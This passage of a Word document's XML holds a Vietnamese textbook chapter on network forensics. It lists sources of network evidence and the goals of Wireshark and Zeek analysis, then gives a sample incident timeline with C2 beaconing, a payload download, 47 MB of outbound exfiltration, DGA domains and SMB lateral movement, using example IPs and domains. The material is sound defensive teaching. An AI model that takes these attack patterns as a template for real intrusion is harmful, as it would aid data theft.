          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>7. Pháp chứng mạng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC5BB0A">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i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Gói tin, flow và log - tái dựng điều đã xảy ra trên đường truyền.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA4D777">
      <w:pPr>
        <w:pStyle w:val="3"/>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Pháp chứng mạng giám sát và phân tích lưu lượng để thu thập chứng cứ, phát hiện xâm nhập và điều tra sự cố. Pháp chứng endpoint tập trung vào điều xảy ra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>trên</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> thiết bị; pháp chứng mạng tập trung vào điều xảy ra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>giữa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> các thiết bị: liên lạc, truyền dữ liệu, đường xâm nhập và lateral movement. Chứng cứ mạng thường khó bị kẻ tấn công xóa hơn artefact endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C36DB3">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="nguồn-chứng-cứ-mạng"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>7.1. Nguồn chứng cứ mạng</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2769"/>
        <w:gridCol w:w="7277"/>
      </w:tblGrid>
      <w:tr w14:paraId="2E79E521">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4E61D5D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Nguồn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="548B566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Giá trị pháp chứng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6833E6D2">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62B0988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Full Packet Capture - PCAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1AF148D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Ghi từng byte truyền đi, chi tiết tối đa nhưng tốn dung lượng.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3B16DB74">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2B55DD9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NetFlow/IPFIX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D45B64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Metadata nguồn, đích, cổng, số byte và thời gian; nhẹ hơn PCAP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3B90DAAE">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7638F4A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Firewall Logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6497640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Quyết định allow/deny, vi phạm chính sách và thử exfiltration bị chặn.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="52D386DD">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421DBC0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Proxy/Web Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B65162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URL truy cập, tệp tải xuống và dữ liệu POST của HTTP/HTTPS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6DC91CA9">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562D831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DNS Logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="14B81AF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Mọi domain được phân giải, hữu ích để phát hiện C2, tải mã độc và hành vi duyệt web.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="191C2DB7">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451B809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DHCP Logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="312A64E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Lịch sử cấp IP, liên kết IP với MAC và hostname.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6E8B441E">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7855C82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VPN Logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="226EF83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Xác thực truy cập từ xa, IP nguồn, thời lượng và dung lượng truyền.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0094A184">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3B8964F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IDS/IPS Alerts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63DBE45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Cảnh báo Snort/Suricata, Zeek notice và chữ ký tấn công.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="510D5746">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116AD30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Email Server Logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1CF1EC0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Chuyển phát, từ chối, lọc spam, IP nguồn và xác thực người gửi.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="41965591">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1832783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Zeek/Bro Logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="790BFFE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 xml:space="preserve">Log theo giao thức: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>conn.log</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>dns.log</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>http.log</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>ssl.log</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>files.log</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>x509.log</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="39"/>
    </w:tbl>
    <w:p w14:paraId="412CF328">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="wiresharktshark-và-zeek"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>7.2. Wireshark/TShark và Zeek</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312440B3">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Các mục tiêu phổ biến khi phân tích PCAP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44545A0A">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Lọc IP, domain, cổng và giao thức đáng ngờ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BA566F">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Follow TCP/HTTP stream để tái dựng phiên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6A626B">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Trích xuất tệp được truyền qua HTTP, SMB hoặc FTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3B7FA2">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Phát hiện beacon định kỳ, DGA và kết nối kéo dài bất thường.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A5C3E5">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Tương quan PCAP với DNS, firewall và endpoint timeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADB48C5">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Một domain gần giống tên chính thức như </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>update.microsoft-cdn.cc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> cần được xem xét như dấu hiệu typosquatting. Beacon đều đặn mỗi 60 giây là chỉ báo mạnh của C2 tự động.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="40"/>
    <w:p w14:paraId="1946963F">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="tái-dựng-dòng-thời-gian-mạng"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>7.3. Tái dựng dòng thời gian mạng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD1B49C">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Ví dụ chuỗi sự kiện:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1423"/>
        <w:gridCol w:w="8623"/>
      </w:tblGrid>
      <w:tr w14:paraId="4088921B">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1561C40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Nguồn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4A49852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Sự kiện</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="35E2780C">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281C537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DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1DF38986">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192.168.1.45</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> truy vấn </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>a1b2c3d4.evil-c2-domain.xyz</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2A8D49EF">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3A3EF7C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Firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E069DA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 xml:space="preserve">Kết nối </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>192.168.1.45:49234 -&gt; 185.220.101.47:4444</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="06F5C0E7">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0F9D5A9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HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="715E23C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 xml:space="preserve">Tải </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>GET /payload.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>, kích thước 2,3 MB về máy nạn nhân.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="22C96C0D">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2B421AC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Proxy/SMB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67BA5F5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 xml:space="preserve">Máy bị nhiễm thử kết nối SMB đến </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>192.168.1.67</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7CC9FA86">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BB6474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Firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F9D211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 xml:space="preserve">Truyền ra ngoài 47 MB đến </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>45.133.240.89:443</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="34C94AF6">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401BB26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DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F24D87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 xml:space="preserve">892 NXDOMAIN với subdomain ngẫu nhiên của </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>malware-domain.tk</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>, gợi ý DGA.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0F0FD6E1">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4FE8269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Firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1753C9F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 xml:space="preserve">Thử kết nối </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>192.168.1.10:445</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>, có thể là lateral movement đến Domain Controller.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="38"/>
      <w:bookmarkEnd w:id="41"/>
    </w:tbl>
    <w:p w14:paraId="0726B44D">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:line="360" w:lineRule="auto"/>
